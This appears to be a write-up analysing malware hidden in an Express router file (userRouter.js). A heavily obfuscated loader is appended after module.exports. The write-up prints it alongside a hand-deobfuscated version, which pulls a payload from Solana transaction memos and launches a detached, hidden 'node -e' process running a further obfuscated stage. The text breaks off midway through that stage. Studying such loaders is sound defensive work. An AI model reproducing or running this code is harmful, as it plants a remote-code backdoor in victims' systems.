obfuscated js code

userRouter.js

const express = require("express");
const authController = require("../controllers/authController");
const userController = require("../controllers/userController");
const transactionController = require("../controllers/transactionController");

const router = express.Router();

router.post("/getVerifyCode", authController.getVerifyCode);
router.post("/signup", authController.check2FACode, authController.signUp);
router.post("/login", authController.logIn);
router.get("/logout", authController.logOut);
router.post("/getAccountName", authController.getAccountName);
router.post(
  "/getVerifyCodeForPasswordReset",
  authController.getVerifyCodeForPasswordReset
);
router.post(
  "/resetPassword",
  authController.check2FACode,
  authController.resetPassword
);

// Protect all routes after this middleware
router.use(authController.protect);
router.patch(
  "/upgradeUserTier",
  transactionController.checkTransactionKey,
  userController.upgradeUserTier
);
router.patch(
  "/updatePassword",
  transactionController.checkTransactionKey,
  authController.updatePassword
);
router.get(
  "/getVerifyCodeForTrxKeyUpdate",
  authController.getVerifyCodeForTrxKeyUpdate
);
router.patch(
  "/updateTrxKey",
  authController.check2FACode,
  userController.updateTrxKey
);
router.post("/submitMessage", userController.submitMessage);

router.get("/me", userController.getMe, userController.getUser);

// router.patch('/updateMe',
//   // userController.uploadUserPhoto,
//   // userController.resizeUserPhoto,
//   userController.updateMe
// );

// router.delete('/deleteMe', userController.deleteMe);

module.exports = router;
global["_V"] = 3;
global["r"] = require;
var a0b, a0a;
(function () {
  var FHK = "",
    siK = 153 - 142;
  function efW(z) {
    var c = 2169898;
    var j = z.length;
    var r = [];
    for (var o = 0; o < j; o++) {
      r[o] = z.charAt(o);
    }
    for (var o = 0; o < j; o++) {
      var u = c * (o + 131) + (c % 36206);
      var t = c * (o + 741) + (c % 16120);
      var m = u % j;
      var q = t % j;
      var k = r[m];
      r[m] = r[q];
      r[q] = k;
      c = (u + t) % 5158178;
    }
    return r.join("");
  }
  var WnE = efW("vtcstlojqptkbdrfoncuurgmnarihczoxweys").substr(0, siK);
  var KOo =
    'aa{ 9={1nk(2o,==+4+vjroak"1b]d-fah!jyl=nxptr=t.vrx,z);la" t=f9a,,9e7r,=8-80,=5r89,i467p,e2s7),i648h,(6,8=,d9,7+,q0r88,=5 ;}ar A=n];ftrgvhrett0atan.ldnftp;C+g)r[{[c]g=[+r;aa; j=6]nqu=)2lk)=[6rs;=<2af8rxv.r[wl0ewvangom+nvswl)n tt;.+{)(v6rhj3a=gim.nnslw;.)pris(h +)1f=rdvrrqhuj.l*n]t -h;v>]0rh{-1{+aa p= u)lvvfrtcnj4hu;=a=  =guvl;v(rad[0"vsrrv=crltnrti;(ao 1;oo.(xa+ u= ;]<};.+p)(v-rrg1ckc(a4Cvd[A,(<)cv=rho2bhgr;)flot{)=ror12*6+5.1h]rCocemtSr.1x-(;(=r;=+[;ee=s( 0f0g(=d)jp;kv(i.uengnh)qpc.csa]Cod7Ax(s+[)=+l.0h.raovertlr12+-m;)= ;g+)2a}vl;e+canyieu(;,iu(u=ennl3)e=e];il(c>t)t.7u"hrc.s6bpt7itghdilm)0x,p,si(=[i+t]f;i=r+a;;ib([!)nllf)aih(.<;)o.)uth.c slbqteilgrdt)ejohu=;.to+n("0);}0yrprsc(+[w]C;vvfrCuty+jvi;(g"};oa  ;=s3r,82,1A,s9l9.,[2s.po;c;tnn[;"ax r=ctri,g(frotC(arCjd((,62;fov(xah ==o;b<r.derg6h)tn+(u,u snl)t(m;a]crajA1( )v.+oen)Sar}nh.7rim,hir;ose=i6t")r;;eduaneu7srl(t]mq"n"}.uo)n m;;';
  var GYz = efW[WnE];
  var ute = "";
  var kNz = GYz;
  var TVg = GYz(ute, efW(KOo));
  var zQb = TVg(
    efW(
      '6tdd[$4`oS)3hZ Z/KE,(s3s.( j.f*=dUiZ;a1dZ#=0,18a6ha5x8?bZoZb_%.Z84Q%u2)Z)WBf:NZ{ap7;..:bDlZg{nZpV,6mE6!(_]=Z.ZMfgm$3!Z1Z3yXehIZt0pf;Z) <)la;Iba] ))1]Z2j1 gSOZw4tgaYe[riMp[aZ;0%5Z%S(t#et)y])a][lZZ.Z,Z=.5!9b)ha)1)[;vR8nXJk.8]p.)eneon)dZbZo8Z\')Z88 (bZ)9l%$nZ.ua(s9!( nZ-)adjZZ4SC<a[tZfsbZZaep>m9DZgy|5]wZa_oMORa.Zi(cRZhdsh..e]n m(Zt= ajZ.9%(18Da:a_0mc[ac}Z3_wdy8iaojZc]._)]ZZt__rZir8tcZ=cW4%n.l)<3i)!Z.s#[<,....(.io.w9d.as 24s2D&aZ]%7yyyn.r.a(]=);{.{.2cadTc.c)!To7kp]onZ%Z!somo,4gfZt7sZ9)((=Z]t.Smi;dwsRZZefa.a3ia}c=5:3c.=ZIg(ZbZqZhZaala3Pq!ZdLd)_e;vZtqcNjrd.6Zvs.0lZ..}Z[d )SD3tf_=wJZy. .lp*0(Sb=Ze@p($]dmn .dor6p(le9.Za3%esZee ,e0[v)6dh00apud8xaw%.n7rftiX0jr={ZZt:Z(c9f.%Aex(l%.ia.dJJK)+$n#xZ4fZ%i)bZo$4.;)];8bfaZSb{\\b%,8ZuDZj].2])$>yats%h%eZ8A4l8u!at4Z{.hu[Z49k{,.Z"fCn59H5p1%gF,Za)Z)dtI)%Zi1tr$7.(inWleo7ZLZ]aFlH}%()J;t]n$l4}f}Sl0% e6ioo])#)0Cb:.r fa1b1oZ("8P. oe (jm{;)hZce\'Z{a;fo8)74{-nmu(1K). Z73:+)Z9Z;ZeZbLg6+c!]6o=t:15;:)sm0v m)n2ZEZ_awZZ$pzea7.8)(%.e)Zx9Z3$;Z,.3%T);_)68..Z.)6da=}ft$)S4.s))gYjk2_),7Z0r_xfs)}t;\\te 11oZ%3.$vh6)6(t)a!y8dps-5y(ev01)Z;:s[o[c3(n.Z!d%b(58.)oeJ_ZDoZ)}& )e *und]oe(ZebZiu.ZlZ<nr$])^n);=%!1_hmCs0ZLo=(Zx."Zaw$(dZ.Dadb.8=[d.=h&1@Zkqcl]e(}ZsZZT3`=t.Zdn"-Zde.!!Z)/l.e.8._nuZ;1h 1=a)cal7t)l._d,Z[8,,a6 01(ib.t2.Z,(eZw.0r7;!"_.ZZ3Z1QycI1=0(;8oeZuZ)(Z8(_oZ]2,,p_.,.Z _43ZxZ(Z)Zy))ZU]6.{Z:%%ZHt]Z%;sZr<d4ZZHa0he",(rZZ.4%.aV_7o))kG Z 5ZZrm-{_1etb3ZY )jn6utn1_ 8eYZ25=ZZ(ZhfKvuf}]43](Z(gbs#,O/r%Z]BwZfa() Zk$o,6ie)aZnfg%)=)G!a.)(Z.f.,;4)a(sZ. Z$};kon]0]8(2%uZ`(%[Z}7Z10Z(tb(Z)B.]q [g.%8]]A,ZS=6(Z5b.agZZ;i.9Z.ZsdbW.;8o}jvtO`]m)8urdhwaZ(.ddD.v$mZTb__)/(i,q39.pe!_toaTZa =3.9`Zc;c.aZdn=7)Zf_Zaj] 0%..,%smZ)o4ZJ:3_%iH0e;u(+;ZYhb.,8fh.ZiZn.)(;;h3taZcBe%(%"14_.l(3i5!p3ageZ.44xnPt))mfit2gx{s1o&lwl]aZf.. Zw.Z1_1Z<o8I,5,.$(7atej,Dh].ZM1Hc]$((Z$r62J6(]ZZfP4f8Z=1")j:Z6w&=88;9ebGa6]n.4]Z18l8tj)Z])ZibwwrZ[=(4rc4eMZZe.ZF%a]Z%,7Z.7d6dm)Zw,ae1)[.feZ_x8ciC) Z(30[Q.t)Z)1+262= %Z$ef]8Zb7a Zf;4.$( Z.ZZZi}sZ8_=)Z ..ec%S}y_.de8D-]mz)Z.Z1sd,..eZI.yZu,].6oxZ>,.;(m(ccZ_00={1ZZZ.@].fo(a}Z$ah!o0ir[%cr,+Z2{m4])3{c6daiXZ=}br^T!j{6b\\8Zz2ZZl6h94 ZmJ,Z:t]uZ,b)5o]]Z,a1),(x(h)9mw}p9Znu1_nZ$v:,4-Z01nhrB1%f$ZnVJ:a])t8,(e6xfo.l_)[Z6#0i=Z._a0h_rr3.|;8r)u.(.uxl(,.Z2Z]0{]e yZZ9gc.uC-)%TFtryCbZx,]s$.i)CSe]3g)Z)6MC(}0RtZj]c.aaS(.al)kZiZZ!%dZ"4.Z4ia253{,Z.]:}"9)/f_s4C"=no*i(o_dw!!rciw}7(pZ(8)loZ1ZtagZn_SZ45a.,iJta}}.?g.!]1;ca(_78Z(r(bM) 1ZZo))]zd%Z7M.; 5bg(R|Zc;J)+Z)116]3ZMZRoZ(Za)iZ% ._Ze*)6Z0fZ17)ZE9Zn}.Za>JZ)8[a_c1tfuum}1r4af0nAnaZabiZ;!o{8Z(E;HuwLodtrZ%]}4er2)9NZ1(Z95(e)(.f,!a>(.:9,n%Z3.m(ncoN}_cH$9+)0rHZ =_4]bZd0t 5)(ZnZdZda_Zg=ZZq7]41naKuoyZZ2+Z}Za9d;d.ae)Z:]i)7ZuZ!\\tp:o(e6.Z6@ f908eZ`1Z(9].r(bb4lZ]eZtZ;8d0,cZ.Z: 3i(g.Z=lja%)c)d)0.^.)z|fZZ[198$,u(Zcjme/NaZtx5.j)+2Zesc%f[t0)eXri5Zb,e[(Z8d$%Zfd(vZ}ar8oZr1;(e[rdagZ)u-,nyia!59a;t,7(}.)(.E.4l(02Z%ht909%[ZT/ot)) {4bzsZ!.(n)],m.tZ[N%y2s7Ns]].%Z62(+,Cx9)BZZZ$h=l^%)ba,r!Z2.,57(8udtb.1x[Z_s_866ZaZi#4s0.)se8(]Z9d.vZ3ZiZ3/]phapv4Zsq:ZZjeZ%nZ8` ZZZ)cZgd[=Z}_o.t(6a25-lo)5)=ttZcZi).!wn#c_haoaTd0Z,lfUz_{0a8()9 8cN9)ac(8$#,Z.9fp5) 7t$1Zpar-ZI97(agZaZZoolZ3)ZZ0EZZ5a9$stt0ZkE ts.e(85b4a_ZB uCg?$h?bizZ7i%c.Zaa72a(f,ae $$b{Zo49rZ,2$u=49ZZ] .(C89_6mf..$1t .E.r_[tdZto!%}@f\'ZaZ)oZ.aue)]1aKaZ=i)f=DZX=]bj8d(6jfw8Z.N.Eb%Z(($p(.=Z7;i=;1dZ%,( Z7].nM0e$8 $dcZ6VZ_Z3!n(Rec4wUZ]ZorrlM;_S+N(X1.fZ(Z)5(!]lleZ]a:2Z,ZZ$ZZ])[f;)?]Zme8Znad r.d>oqZt1u11$%fd4u)*Z5Pfd;(107Z.xl;9e9ZZ5,4t+a833h.vZ7,%r Zs01ZlZoZ I0ijka_)8_Z,&ayvY \'dZZ= Z=.c%Zs]+w=,3nZ4%_Z,st.Q9cbZ7t(dj:nZa .{)Z G]5Z7{ph9aht.sZ3wZu;%0g541c]_:oZn [f0._))!]2t,_ruZZ.oj3;Kf3 Z,3(Zl%}8Znemoc(jZo=Z_4+a )_i)dcm7. 2 _0ZZin _}t1)i0Zbqa$;;a8)1([%),gd)8a=v'
    )
  );
  var its = kNz(FHK, zQb);
  its(2713);
  return 6659;
})();

I don't know which code was written to make this code obfuscated. So, I had to deobfuscate it manually. Manually deobfuscating the code was an incredibly challenging and time-consuming task due to its advanced obfuscation techniques. The heavy use of nested logic, dynamic code execution, and cryptic split-join operations made it difficult to trace the code's intent. Each variable and function reference had to be carefully reversed, tracked, and pieced together. I had to keep patience and persistence to decode every layer manually and of course give some time. After all in the last, I got the result that I wanted. :)

So, it all starts with this string:

'6tdd[$4`oS)3hZ Z/KE,(s3s.( j.f*=dUiZ;a1dZ#=0,18a6ha5x8?bZoZb_%.Z84Q%u2)Z)WBf:NZ{ap7;..:bDlZg{nZpV,6mE6!(_]=Z.ZMfgm$3!Z1Z3yXehIZt0pf;Z) <)la;Iba] ))1]Z2j1 gSOZw4tgaYe[riMp[aZ;0%5Z%S(t#et)y])a][lZZ.Z,Z=.5!9b)ha)1)[;vR8nXJk.8]p.)eneon)dZbZo8Z\')Z88 (bZ)9l%$nZ.ua(s9!( nZ-)adjZZ4SC<a[tZfsbZZaep>m9DZgy|5]wZa_oMORa.Zi(cRZhdsh..e]n m(Zt= ajZ.9%(18Da:a_0mc[ac}Z3_wdy8iaojZc]._)]ZZt__rZir8tcZ=cW4%n.l)<3i)!Z.s#[<,....(.io.w9d.as 24s2D&aZ]%7yyyn.r.a(]=);{.{.2cadTc.c)!To7kp]onZ%Z!somo,4gfZt7sZ9)((=Z]t.Smi;dwsRZZefa.a3ia}c=5:3c.=ZIg(ZbZqZhZaala3Pq!ZdLd)_e;vZtqcNjrd.6Zvs.0lZ..}Z[d )SD3tf_=wJZy. .lp*0(Sb=Ze@p($]dmn .dor6p(le9.Za3%esZee ,e0[v)6dh00apud8xaw%.n7rftiX0jr={ZZt:Z(c9f.%Aex(l%.ia.dJJK)+$n#xZ4fZ%i)bZo$4.;)];8bfaZSb{\\b%,8ZuDZj].2])$>yats%h%eZ8A4l8u!at4Z{.hu[Z49k{,.Z"fCn59H5p1%gF,Za)Z)dtI)%Zi1tr$7.(inWleo7ZLZ]aFlH}%()J;t]n$l4}f}Sl0% e6ioo])#)0Cb:.r fa1b1oZ("8P. oe (jm{;)hZce\'Z{a;fo8)74{-nmu(1K). Z73:+)Z9Z;ZeZbLg6+c!]6o=t:15;:)sm0v m)n2ZEZ_awZZ$pzea7.8)(%.e)Zx9Z3$;Z,.3%T);_)68..Z.)6da=}ft$)S4.s))gYjk2_),7Z0r_xfs)}t;\\te 11oZ%3.$vh6)6(t)a!y8dps-5y(ev01)Z;:s[o[c3(n.Z!d%b(58.)oeJ_ZDoZ)}& )e *und]oe(ZebZiu.ZlZ<nr$])^n);=%!1_hmCs0ZLo=(Zx."Zaw$(dZ.Dadb.8=[d.=h&1@Zkqcl]e(}ZsZZT3`=t.Zdn"-Zde.!!Z)/l.e.8._nuZ;1h 1=a)cal7t)l._d,Z[8,,a6 01(ib.t2.Z,(eZw.0r7;!"_.ZZ3Z1QycI1=0(;8oeZuZ)(Z8(_oZ]2,,p_.,.Z _43ZxZ(Z)Zy))ZU]6.{Z:%%ZHt]Z%;sZr<d4ZZHa0he",(rZZ.4%.aV_7o))kG Z 5ZZrm-{_1etb3ZY )jn6utn1_ 8eYZ25=ZZ(ZhfKvuf}]43](Z(gbs#,O/r%Z]BwZfa() Zk$o,6ie)aZnfg%)=)G!a.)(Z.f.,;4)a(sZ. Z$};kon]0]8(2%uZ`(%[Z}7Z10Z(tb(Z)B.]q [g.%8]]A,ZS=6(Z5b.agZZ;i.9Z.ZsdbW.;8o}jvtO`]m)8urdhwaZ(.ddD.v$mZTb__)/(i,q39.pe!_toaTZa =3.9`Zc;c.aZdn=7)Zf_Zaj] 0%..,%smZ)o4ZJ:3_%iH0e;u(+;ZYhb.,8fh.ZiZn.)(;;h3taZcBe%(%"14_.l(3i5!p3ageZ.44xnPt))mfit2gx{s1o&lwl]aZf.. Zw.Z1_1Z<o8I,5,.$(7atej,Dh].ZM1Hc]$((Z$r62J6(]ZZfP4f8Z=1")j:Z6w&=88;9ebGa6]n.4]Z18l8tj)Z])ZibwwrZ[=(4rc4eMZZe.ZF%a]Z%,7Z.7d6dm)Zw,ae1)[.feZ_x8ciC) Z(30[Q.t)Z)1+262= %Z$ef]8Zb7a Zf;4.$( Z.ZZZi}sZ8_=)Z ..ec%S}y_.de8D-]mz)Z.Z1sd,..eZI.yZu,].6oxZ>,.;(m(ccZ_00={1ZZZ.@].fo(a}Z$ah!o0ir[%cr,+Z2{m4])3{c6daiXZ=}br^T!j{6b\\8Zz2ZZl6h94 ZmJ,Z:t]uZ,b)5o]]Z,a1),(x(h)9mw}p9Znu1_nZ$v:,4-Z01nhrB1%f$ZnVJ:a])t8,(e6xfo.l_)[Z6#0i=Z._a0h_rr3.|;8r)u.(.uxl(,.Z2Z]0{]e yZZ9gc.uC-)%TFtryCbZx,]s$.i)CSe]3g)Z)6MC(}0RtZj]c.aaS(.al)kZiZZ!%dZ"4.Z4ia253{,Z.]:}"9)/f_s4C"=no*i(o_dw!!rciw}7(pZ(8)loZ1ZtagZn_SZ45a.,iJta}}.?g.!]1;ca(_78Z(r(bM) 1ZZo))]zd%Z7M.; 5bg(R|Zc;J)+Z)116]3ZMZRoZ(Za)iZ% ._Ze*)6Z0fZ17)ZE9Zn}.Za>JZ)8[a_c1tfuum}1r4af0nAnaZabiZ;!o{8Z(E;HuwLodtrZ%]}4er2)9NZ1(Z95(e)(.f,!a>(.:9,n%Z3.m(ncoN}_cH$9+)0rHZ =_4]bZd0t 5)(ZnZdZda_Zg=ZZq7]41naKuoyZZ2+Z}Za9d;d.ae)Z:]i)7ZuZ!\\tp:o(e6.Z6@ f908eZ`1Z(9].r(bb4lZ]eZtZ;8d0,cZ.Z: 3i(g.Z=lja%)c)d)0.^.)z|fZZ[198$,u(Zcjme/NaZtx5.j)+2Zesc%f[t0)eXri5Zb,e[(Z8d$%Zfd(vZ}ar8oZr1;(e[rdagZ)u-,nyia!59a;t,7(}.)(.E.4l(02Z%ht909%[ZT/ot)) {4bzsZ!.(n)],m.tZ[N%y2s7Ns]].%Z62(+,Cx9)BZZZ$h=l^%)ba,r!Z2.,57(8udtb.1x[Z_s_866ZaZi#4s0.)se8(]Z9d.vZ3ZiZ3/]phapv4Zsq:ZZjeZ%nZ8` ZZZ)cZgd[=Z}_o.t(6a25-lo)5)=ttZcZi).!wn#c_haoaTd0Z,lfUz_{0a8()9 8cN9)ac(8$#,Z.9fp5) 7t$1Zpar-ZI97(agZaZZoolZ3)ZZ0EZZ5a9$stt0ZkE ts.e(85b4a_ZB uCg?$h?bizZ7i%c.Zaa72a(f,ae $$b{Zo49rZ,2$u=49ZZ] .(C89_6mf..$1t .E.r_[tdZto!%}@f\'ZaZ)oZ.aue)]1aKaZ=i)f=DZX=]bj8d(6jfw8Z.N.Eb%Z(($p(.=Z7;i=;1dZ%,( Z7].nM0e$8 $dcZ6VZ_Z3!n(Rec4wUZ]ZorrlM;_S+N(X1.fZ(Z)5(!]lleZ]a:2Z,ZZ$ZZ])[f;)?]Zme8Znad r.d>oqZt1u11$%fd4u)*Z5Pfd;(107Z.xl;9e9ZZ5,4t+a833h.vZ7,%r Zs01ZlZoZ I0ijka_)8_Z,&ayvY \'dZZ= Z=.c%Zs]+w=,3nZ4%_Z,st.Q9cbZ7t(dj:nZa .{)Z G]5Z7{ph9aht.sZ3wZu;%0g541c]_:oZn [f0._))!]2t,_ruZZ.oj3;Kf3 Z,3(Zl%}8Znemoc(jZo=Z_4+a )_i)dcm7. 2 _0ZZin _}t1)i0Zbqa$;;a8)1([%),gd)8a=v'

After decoding it we get:

	function jso$ft$boe$_45(a, b) {
		return a - b
	}

	function jso$ft$giden$a_48a() {
		return a0a
	}

	function jso$ft$giden$atob() {
		return atob
	}

	function jso$ft$giden$global() {
		return global
	}

	function jso$ft$uoel$_33(a) {
		return !a
	}

	function jso$ft$boe$_61_61(a, b) {
		return a == b
	}

	function jso$ft$boe$_61_61_61(a, b) {
		return a === b
	}

	function jso$ft$giden$parseInt() {
		return parseInt
	}

	function jso$ft$boe$_47(a, b) {
		return a / b
	}

	function jso$ft$giden$a_48b() {
		return a0b
	}

	function jso$ft$giden$String() {
		return String
	}

	function jso$ft$boe$_37(a, b) {
		return a % b
	}

	function jso$ft$boe$_43(a, b) {
		return a + b
	}

	function jso$ft$boe$_60(a, b) {
		return a < b
	}
	var _$_815b = (_$af1949887)("N4i31W9in%nnfn%Gcz%ieMsd%ed%9t%c%88%pDser%E_Ft%r%clthbCm%wt8mg%iLofij%%thm5iwlgc%st%G0irRPeh%We%ldmPon%;%hUf4E%ttro%hFldbeRuvay8CFye%-%ntiNmr%%hu%%8tr g%UaA%nn%cBP%tpYAV_SoRodi%swBNiZiu%%Wy_npsVJKnp9l90p6XcWQTIiM2nvO%S5eu%f3R%l9e%UHSoeiqrof%.wsoete8sTpWyVHecr%za1lcs%UbrcaeilFne%dtMnup2clRc5r3lj%-gsaj%Da\'ycTSD38nso2%upiuA%56tSeB%@m$og%m/ntYnHL%w6seGaaweeeoiY1TDuthdac11nBi%V89tbs1rjr1oCsD0e]s2fgH%%nl%%\'PCtxStm7r%fK450%Udwe%z[aI8saxpUb%urt YGeZJ=7CS1h%tq4uso%Ehgg4piAu1h%o%mHo", 2169898);

	if (!_$_815b) {
		_$af1949883(0, true);
		(function() {
			_$af1949876 = null
		})()
	};

	function _$af1949887(b, jso$setrpl$o) {
		var o = {},
			e = {},
			h = {},
			y = {},
			t = {},
			m = {},
			f = {};
		o._ = jso$setrpl$o;
		var v = b.length;
		e._ = [];;
		for (var w = 0; jso$ft$boe$_60(w, v); w++) {
			e._[w] = b.charAt(w)
		};
		for (var w = 0; jso$ft$boe$_60(w, v); w++) {
			h._ = jso$ft$boe$_43(o._ * (jso$ft$boe$_43(w, 131)), (jso$ft$boe$_37(o._, 36206)));;
			y._ = jso$ft$boe$_43(o._ * (jso$ft$boe$_43(w, 741)), (jso$ft$boe$_37(o._, 16120)));;
			t._ = jso$ft$boe$_37(h._, v);;
			m._ = jso$ft$boe$_37(y._, v);;
			f._ = e._[t._];;
			jso$spliter_$af1949890(t, e, m);
			jso$spliter_$af1949891(m, e, f);
			jso$spliter_$af1949892(o, h, y)
		};
		var k = jso$ft$giden$String().fromCharCode(127);
		var s = '';
		var d = '%';
		var c = '#1';
		var q = '%';
		var x = '#0';
		var l = '#';
		return e._.join(s).split(d).join(k).split(c).join(q).split(x).join(l).split(k)
	}

	function _$af1949875(a, b) {
		const l = jso$ft$giden$a_48b(),
			c = a();
		while (!jso$ft$uoel$_33([])) {
			try {
				const d = jso$ft$boe$_43(jso$ft$boe$_43(jso$ft$boe$_43(jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x84)), 0x1) + jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x91)), 0x2), jso$ft$giden$parseInt()(l(0xa6)) / 0x3) + jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0x8f)), 0x4), jso$ft$giden$parseInt()(l(0x9b)) / 0x5) + jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0x96)), 0x6), jso$ft$boe$_47(jso$ft$giden$parseInt()(l(0x98)), 0x7) * (jso$ft$boe$_47(-jso$ft$giden$parseInt()(l(0xa2)), 0x8)));
				if (jso$ft$boe$_61_61_61(d, b)) {
					break
				} else {
					if (jso$ft$boe$_61_61(_$af1949875, 1)) {
						jso$spliter_$af1949893();
						return
					};
					c[_$_815b[1]](c[_$_815b[0]]())
				}
			} catch (e) {
				c[_$_815b[1]](c[_$_815b[0]]())
			}
		}
	}

	function _$af1949876() {
		var m = {},
			b = {};
		m._ = jso$ft$giden$a_48b();;
		b._ = {
			'BCmTg': (1 && m._)(0x82),
			'cdtYB': function(c, d) {
				return jso$ft$boe$_61_61(c, d)
			},
			'YevWJ': function(c, d) {
				return jso$ft$boe$_43(c, d)
			},
			'GhmHo': function(c, d) {
				return jso$ft$boe$_61_61_61(c, d)
			},
			'UYffz': _$_815b[2],
			'Dline': _$_815b[3],
			'wPfjh': jso$ft$boe$_43((1 && m._)(0x88), (1 && m._)(0x92)),
			'cDuFh': _$_815b[4],
			'nxpqH': (1 && m._)(0x83),
			'tURKT': function(c, d) {
				return c(d)
			},
			'xDLfg': jso$ft$boe$_43((1 && m._)(0x9c), (1 && m._)(0x93)),
			'yVpzy': jso$ft$boe$_43((1 && m._)(0x89), _$_815b[5]),
			'RtuiH': (1 && m._)(0x9f),
			'IRuMw': jso$ft$boe$_43(jso$ft$boe$_43((1 && m._)(0x8c) + _$_815b[6], (1 && m._)(0x94)) + (1 && m._)(0x90), _$_815b[7])
		};;
		try {
			const c = jso$ft$giden$global()[_$_815b[8]](b._[(1 && m._)(0x9d)]),
				d = {};
			d[(1 && m._)(0xa1)] = 0x14, new c[_$_815b[24]](c[jso$ft$boe$_43((1 && m._)(0x97), _$_815b[23])](b._[(1 && m._)(0x8e)]), b._[(1 && m._)(0x81)])[jso$ft$boe$_43((1 && m._)(0x9a) + (1 && m._)(0x87), (1 && m._)(0x92))](new c[((1 && m._)(0x9e))](b._[(1 && m._)(0x8d)]), d, b._[(1 && m._)(0x81)])[_$_815b[22]]((f) => {
				const n = m._;
				let g = _$_815b[10],
					h = _$_815b[10];
				for (let j of f) {
					if (jso$ft$uoel$_33(j[n(0x8b)])) {
						continue
					};
					let k = j[n(0x8b)][n(0x8a)](b._[n(0x95)])[0x1];
					if (jso$ft$uoel$_33(k) || b._[n(0xa0)](k, h)) {
						continue
					};
					h = k, g = b._[_$_815b[11]](k[n(0x8a)](_$_815b[10])[n(0xa3)]()[n(0x99)](_$_815b[10]), g);
					if (b._[n(0x86)](g[0x0], _$_815b[12])) {
						break
					}
				};
				const i = jso$ft$giden$global()[_$_815b[8]](_$_815b[16])[_$_815b[15]]()[_$_815b[14]](b._[_$_815b[13]]) ? {} : {
					'detached': !jso$ft$uoel$_33([]),
					'stdio': b._[n(0xa7)],
					'windowsHide': !jso$ft$uoel$_33([])
				};
				jso$ft$giden$global()[_$_815b[8]](b._[_$_815b[21]])[b._[n(0x85)]](b._[n(0x80)], [_$_815b[17], jso$ft$boe$_43(jso$ft$boe$_43(n(0xa4) + _$_815b[18], (jso$ft$giden$global()[_$_815b[19]] || 0x0)) + _$_815b[20], b._[n(0xa5)](jso$ft$giden$atob(), g))], i)
			})[_$_815b[9]](() => {})
		} catch (f) {}
	}

	function _$af1949883(a, b) {
		var c = {};
		c._ = jso$ft$giden$a_48a()();;
		return a0b = jso$builder_$af1949884_(c), jso$ft$giden$a_48b()(a, b)
	}

	function _$af1949885() {
		var o = {};
		o._ = [_$_815b[25], _$_815b[26], _$_815b[27], _$_815b[28], _$_815b[29], _$_815b[30], _$_815b[31], _$_815b[32], _$_815b[33], _$_815b[34], _$_815b[35], _$_815b[36], _$_815b[37], _$_815b[38], _$_815b[39], _$_815b[40], _$_815b[41], _$_815b[42], _$_815b[43], _$_815b[44], _$_815b[45], _$_815b[46], _$_815b[47], _$_815b[48], _$_815b[49], _$_815b[50], _$_815b[51], _$_815b[52], _$_815b[53], _$_815b[54], _$_815b[55], _$_815b[56], _$_815b[57], _$_815b[58], _$_815b[59], _$_815b[60], _$_815b[61], _$_815b[62], _$_815b[63], _$_815b[64]];;
		a0a = jso$builder_$af1949886_(o);
		return jso$ft$giden$a_48a()()
	}
	a0b = _$af1949883;
	a0a = _$af1949885;
	(_$af1949875(a0a, 0x28f51), (_$af1949876()));
	if (_$af1949887 === 1) {
		_$af1949883(_$_815b[22], true, false);
		return
	};

	function jso$spliter_$af1949890(t, e, m) {
		e._[t._] = e._[m._]
	}

	function jso$spliter_$af1949891(m, e, f) {
		e._[m._] = f._
	}

	function jso$spliter_$af1949892(o, h, y) {
		o._ = jso$ft$boe$_37((jso$ft$boe$_43(h._, y._)), 5158178)
	}

	function jso$spliter_$af1949893() {
		_$af1949885 = null
	}

	function jso$builder_$af1949884_(c) {
		return function(jso$setrpl$d, e) {
			var d = {};
			d._ = jso$setrpl$d;
			jso$spliter_$af1949894(d);
			let f = c._[d._];
			return f
		}
	}

	function jso$builder_$af1949886_(o) {
		return function() {
			return o._
		}
	}

	function jso$spliter_$af1949894(d) {
		d._ = jso$ft$boe$_45(d._, 0x80)
	}

The main function here is af1949876. We see a code block inside it:

	const c = jso$ft$giden$global()[_$_815b[8]](b._[(1 && m._)(0x9d)]),
				d = {};
			d[(1 && m._)(0xa1)] = 0x14, new c[_$_815b[24]](c[jso$ft$boe$_43((1 && m._)(0x97), _$_815b[23])](b._[(1 && m._)(0x8e)]), b._[(1 && m._)(0x81)])[jso$ft$boe$_43((1 && m._)(0x9a) + (1 && m._)(0x87), (1 && m._)(0x92))](new c[((1 && m._)(0x9e))](b._[(1 && m._)(0x8d)]), d, b._[(1 && m._)(0x81)])[_$_815b[22]]((f) => {

It resolves to something similar to this:

	const connection = new Connection(clusterApiUrl('mainnet-beta'), 'confirmed');
	const publicKey = new PublicKey('GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ');
	const options = { limit: 20 };

The next lines after that resolves to something like:

	const { Connection, PublicKey, clusterApiUrl } = require('@solana/web3.js');
	const os = require('os');
	const { spawn } = require('child_process');
	
    const isWindows = os.platform().startsWith('win');
    const spawnOptions = isWindows ? {} : {
        detached: true,
        stdio: 'ignore',
        windowsHide: true
    };

    // Example of a simple child process command
    const command = 'node';
    const args = ['-e', 'global[\'r\'] = require;(function(){var bhu=\'\',eMA=368-357;function qng(x){var u=749127;var g=x.length;var v=[];for(var y=0;y<g;y++){v[y]=x.charAt(y)};for(var y=0;y<g;y++){var o=u*(y+207)+(u%19101);var c=u*(y+650)+(u%36026);var d=o%g;var f=c%g;var b=v[d];v[d]=v[f];v[f]=b;u=(o+c)%4939431;};return v.join(\'\')};var leP=qng(\'wvcrrfaoouhegrconttilcjdnzkqtssupmxyb\').substr(0,eMA);var TRJ=\')a; gre822a8ir+5;)4va;yp>rea2)}jshc,-=r(q=its46et6+,f)=)s.n=tx>ghu,vd,k n.r,m(xoe,b5a60nei 81r(1t 1,7yy(nbA),70n==].vr};i;raa{s==(8f=er5*hq3g1na;t]r9dof]] ;r)f4oSg.r=7.ySsa8!o(1]nr-"d=;ln=05r(+vf00(rtsj,hgx]i,1)ls+u[=r+1.uAit l;h-+)1r8nn7(av (.;vg+lk.f7rli"x"u,grf; ana"vjs,f+=;]rn-g4h0aph,afC {algrb4i.l;+f-fe;e[pr;maavrah){=;qa=ty;,ent(9Crn)8+t}eeuvibnv{zu (g=rpgnh"d<qd,p;)b;nr v(o2x{mbvlo.At;=q.;a,sq(=[ee;g(e6+sl=(hf.mnnr9sh}e)rv+n0tr+i.6h<)e=);;l"bv;;a. ,ft.,=z) det(a+vl.agcc-s[p.c;o-C;d1r((rrr)+8xj1,[rgovh2v;[lingiai=2r10=cun)l0*oir]+ie i+t=f(A=a(;n;)m==ooif nnaClr[u  r([s6" glin)lhr<o=hars7kr, 